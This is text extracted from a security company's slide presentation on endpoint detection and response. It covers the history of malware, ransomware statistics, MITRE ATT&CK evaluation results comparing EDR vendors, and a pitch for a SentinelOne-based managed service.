Professional Documents
Culture Documents
Endpoint Detection
and Response
A deep dive into Endpoint Protection
Systems and their key capabilities
•
Cyber Security Lead Engineer
17 year’s experience with Sec-1
(Claranet Cyber Security)
• Background - Implementing
cyber security solutions
• Mainly covering…
SIEM / EDR / Firewall / BAS / MFA
Agenda
Key Security
Threats
Threat Evolution - Key dates
1986 1987 1989 2021
FIRST COMPUTER AV SOFTWARE BIRTH OF
VIRUS WRITTEN FOR AVAILABLE RANSOMWARE
AN IBM PC (AIDS TROJAN) • Ransomware as a service
• subscription services available
(Dark Web)
• Affiliate programs
2000 2001 2003 • Creator's gain % of paid ransoms
LOVE LETTER VIRUS (POC CODE RED SQL SLAMMER
as commission
FOR SOCIAL ENGINEERING) 1ST FILELESS MALWARE FILELESS MALWARE
PAYLOAD DELIVERY
• Open RaaS
• Closed RaaS
• Lone Wolves
•
2008 2013 2016 •
Ransomware + Data leak bundled
Largest Ransom ever paid by CNA
BITCOIN INTRODUCED CRYPTOLOCKER LOCKY
Financial $40m
(GAME CHANGER) RANSOMWARE TERM BECOMES (RANSOMWARE)
A HOUSEHOLD NAME (HEALTHCARE US) • Supply chain attacks
2017 2017
WANNACRY HUGE DATA BREACH
HEALTHCARE UK (FILELESS MALWARE)
(RANSOMWARE)
Supply Chain attacks
Supply Chain
SolarWinds Orion attack highlights Backdoor Access
Attacker
the difficulty of defending against
supply chain attacks.
Hafnium
Feb 2021
Threat Evolution - Fileless Malware
General Fileless
malware example
Recovery Process
• Pay the ransom
• Reinstall the device
• Restore using 3rd Party system
(outside of EPP)
• KB article – manual clean up
• Ransomware decryption tools
(Not guaranteed, No ETA)
Investigation
• Root cause analysis / Data
Threat landscape stats
Ransomware Stats General breach stats
• In 2021 the average ransom demand was $5.3m • 4 in every 10 businesses have reported a cyber
up 518% breach in the last 12 months (40%)
• The average ransom paid by victims was • In medium sized businesses this is 65%
$570,000 up 82%
• In Large businesses this is 64%
• The average amount of downtime a company
experiences after a ransomware attack is 21 days • Attacks leveraging PowerShell grew by 208%
• Ransomware attacks increased by 151% so far in • Attacks leveraging MS office grew by 199%
2021 with even higher levels expected in 2022
(Due to RaaS providing a lower barrier to entry)
Endpoint Detection and Response
Endpoint
technology
definitions
Endpoint technology definitions (& Next Gen)
Active EDR
Real world example
Active EDR – Theory in the real world
Active EDR – Theory in the real world
Event 1
PERSON 1 - Parks a car outside the Hatton Garden safety deposit building and sits there for an hour
Event 2
PERSON 2 - Arrives by bus, walks around the perimeter of the building and takes some photos
Event 3
PERSON 3 – “An alarms expert” downloads the specs & design documents for the buildings alarm system
Event 4
They all meet up together for a pint in a local pub
Active EDR – Theory in the real world
Active EDR – Theory in the cyber world
Event 1
Open a spread sheet containing a macro
Event 2
Enable Macros to update a currency exchange rate
Event 3
Macro launches PowerShell
Event 4
PowerShell downloads and executes a payload to memory
Context is key!
Endpoint Detection and Response
Product selection
& evaluation
Selecting an Endpoint Solution
Malicious
Benign
Detection / Static AI (Next-Gen)
Decision Tree (Random Forrest ML Model)
True False
True False
True
Attacks without warning Enjoys Walks with you Falls asleep in odd places
Dog 2% Dog 70% Dog 99% Dog 40% Dog 3% Dog 8% Dog 46%
Cat 98% Cat 30% Cat 1% Cat 60% Cat 97% Cat 92% Cat 54%
Static AI / Behavioural AI (Next-Gen)
Detection Engine/Method Key Advantages Key Disadvantages
• Visibility methods • On Disk Write (What is it?) • Only analyses files written to disk
(Can’t see memory based script and file execution)
• Active EDR Advanced Providing an interface for analysts to pivot around telemetry • Supports analyst driven intelligence to discover threats
(Threat hunting capabilities) data from a device to conduct in depth investigations legacy detection engines & AI models cant, including living
off the land attacks
• Implementation and configuration changes • Will the product require lots of config changes to perform to its full capability?
• Agent Autonomy • Does the product have the ability to perform as well and at machine speed when offline?
• Remediation and recovery options • Can the endpoint solution isolate an infected device from the network to prevent spread?
• Does the product provide full remediation of an attack storyline (Everything the attacker touched – Undone)
• What about a successful ransomware attack - Can the Endpoint solution perform a full recovery for you quickly
and with no input from 3rd party systems
• System Support • Do you need a separate solution to cover other systems in your estate?
- Remote workers
- Servers
- Cloud environments
- Dev environments (Docker Kubernetes, Amazon EKS etc)
Gartner Magic Quadrant Leader
MITRE ATT&CK
https://attackevals.mitre-engenuity.org/enterprise/carbanak_fin7/
MITRE ATT&CK
https://attackevals.mitre-engenuity.org/enterprise/carbanak_fin7/
Endpoint Detection and Response
Our chosen
EDR vendor
Our chosen vendor
Visibility (Mitre ATT&CK results)
Delayed
Vendors of note
Detections
Sentinel One 0
Sophos 0
Microsoft 1
CrowdStrike 15
Configuration changes (Mitre ATT&CK results)
Sentinel One 0
Sophos 6
CrowdStrike 25
Microsoft 35
Analytic Detection Coverage (Mitre ATT&CK results)
Analytic Detection
Vendors of note
Coverage
Sentinel One 159/174
Microsoft 134/174
CrowdStrike 64/174
Sophos 39/174
Storyline Tracking
Detection Engines (Mitre ATT&CK results)
• Reputation Engine
• Static AI “Malicious”
• Static AI “Suspicious”
• Static AI - Executables
• Static AI - Potentially Unwanted Apps
• Behavioural AI – Executables
• Behavioural AI - Documents, Scripts
• Behavioural AI - Lateral Movement
• Behavioural AI - Anti-Exploitation / File-less
• Application control (Containerised workloads)
• Detect Interactive Threats (Insider Threats)
SentinelOne technology overview
MITRE ATT&CK & Gartner Leader
Sentinel One - System architecture
Live Ransomware
Demo
Recover encrypted files in minutes!
EDR Management Challenges
Time
• To review all suspicious alerts
(Next-Gen EDR / Meta data)
=
analysis (Next Gen AV)
Security REMEDIATE
Operations Centre
ROLLBACK
Quarterly Service
Reviews
Monthly Security
Reports
Service SLA’s & response model
P1 Critical Response:
Notification within 15 minutes 15 minutes
P2 High Response:
Notification within 30 minutes 30 minutes
P3 Medium Response:
Notification within 2 hours 2 hours
P4 Low
Response:
Notification within 4 hours 4 hours
Claranet Online
SOC Team - Threat Hunting
• Abnormal behaviour on multiple servers (Exchange, DC’s)
• Current AV didn’t detect anything suspicious
• Sentinel One found multiple malicious files on customer systems
Deep Visibility
Provided the tools & the detailed meta data for the SOC team
to identify and nullify this threat.
EDR Service offering
• Licensed Software